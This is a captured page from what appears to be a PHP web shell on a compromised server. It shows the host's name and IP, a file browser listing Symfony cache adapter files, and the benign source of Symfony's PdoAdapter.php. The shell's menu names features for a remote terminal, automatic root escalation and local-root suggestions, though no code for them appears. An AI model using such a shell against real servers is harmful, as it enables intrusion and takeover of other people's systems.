Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.145.88.233
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
myadmin /
vendor /
symfony /
cache /
Adapter /
Delete
Unzip
Name
Size
Permission
Date
Action
AbstractAdapter.php
8.02
KB
-rw-r--r--
2021-02-05 18:32
AbstractTagAwareAdapter.php
12.17
KB
-rw-r--r--
2021-02-05 18:32
AdapterInterface.php
1
KB
-rw-r--r--
2021-02-05 18:32
ApcuAdapter.php
643
B
-rw-r--r--
2021-02-05 18:32
ArrayAdapter.php
4.25
KB
-rw-r--r--
2021-02-05 18:32
ChainAdapter.php
8.6
KB
-rw-r--r--
2021-02-05 18:32
DoctrineAdapter.php
700
B
-rw-r--r--
2021-02-05 18:32
FilesystemAdapter.php
933
B
-rw-r--r--
2021-02-05 18:32
FilesystemTagAwareAdapter.php
7.42
KB
-rw-r--r--
2021-02-05 18:32
MemcachedAdapter.php
1.27
KB
-rw-r--r--
2021-02-05 18:32
NullAdapter.php
2.71
KB
-rw-r--r--
2021-02-05 18:32
PdoAdapter.php
2.31
KB
-rw-r--r--
2021-02-05 18:32
PhpArrayAdapter.php
9.41
KB
-rw-r--r--
2021-02-05 18:32
PhpFilesAdapter.php
1.32
KB
-rw-r--r--
2021-02-05 18:32
ProxyAdapter.php
8.21
KB
-rw-r--r--
2021-02-05 18:32
Psr16Adapter.php
1.84
KB
-rw-r--r--
2021-02-05 18:32
RedisAdapter.php
1
KB
-rw-r--r--
2021-02-05 18:32
RedisTagAwareAdapter.php
11.06
KB
-rw-r--r--
2021-02-05 18:32
SimpleCacheAdapter.php
553
B
-rw-r--r--
2021-02-05 18:32
TagAwareAdapter.php
11.35
KB
-rw-r--r--
2021-02-05 18:32
TagAwareAdapterInterface.php
785
B
-rw-r--r--
2021-02-05 18:32
TraceableAdapter.php
6.9
KB
-rw-r--r--
2021-02-05 18:32
TraceableTagAwareAdapter.php
926
B
-rw-r--r--
2021-02-05 18:32
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Cache\Adapter; use Doctrine\DBAL\Connection; use Symfony\Component\Cache\Exception\InvalidArgumentException; use Symfony\Component\Cache\Marshaller\MarshallerInterface; use Symfony\Component\Cache\PruneableInterface; use Symfony\Component\Cache\Traits\PdoTrait; class PdoAdapter extends AbstractAdapter implements PruneableInterface { use PdoTrait; protected $maxIdLength = 255; /** * You can either pass an existing database connection as PDO instance or * a Doctrine DBAL Connection or a DSN string that will be used to * lazy-connect to the database when the cache is actually used. * * When a Doctrine DBAL Connection is passed, the cache table is created * automatically when possible. Otherwise, use the createTable() method. * * List of available options: * * db_table: The name of the table [default: cache_items] * * db_id_col: The column where to store the cache id [default: item_id] * * db_data_col: The column where to store the cache data [default: item_data] * * db_lifetime_col: The column where to store the lifetime [default: item_lifetime] * * db_time_col: The column where to store the timestamp [default: item_time] * * db_username: The username when lazy-connect [default: ''] * * db_password: The password when lazy-connect [default: ''] * * db_connection_options: An array of driver-specific connection options [default: []] * * @param \PDO|Connection|string $connOrDsn a \PDO or Connection instance or DSN string or null * * @throws InvalidArgumentException When first argument is not PDO nor Connection nor string * @throws InvalidArgumentException When PDO error mode is not PDO::ERRMODE_EXCEPTION * @throws InvalidArgumentException When namespace contains invalid characters */ public function __construct($connOrDsn, string $namespace = '', int $defaultLifetime = 0, array $options = [], MarshallerInterface $marshaller = null) { $this->init($connOrDsn, $namespace, $defaultLifetime, $options, $marshaller); } }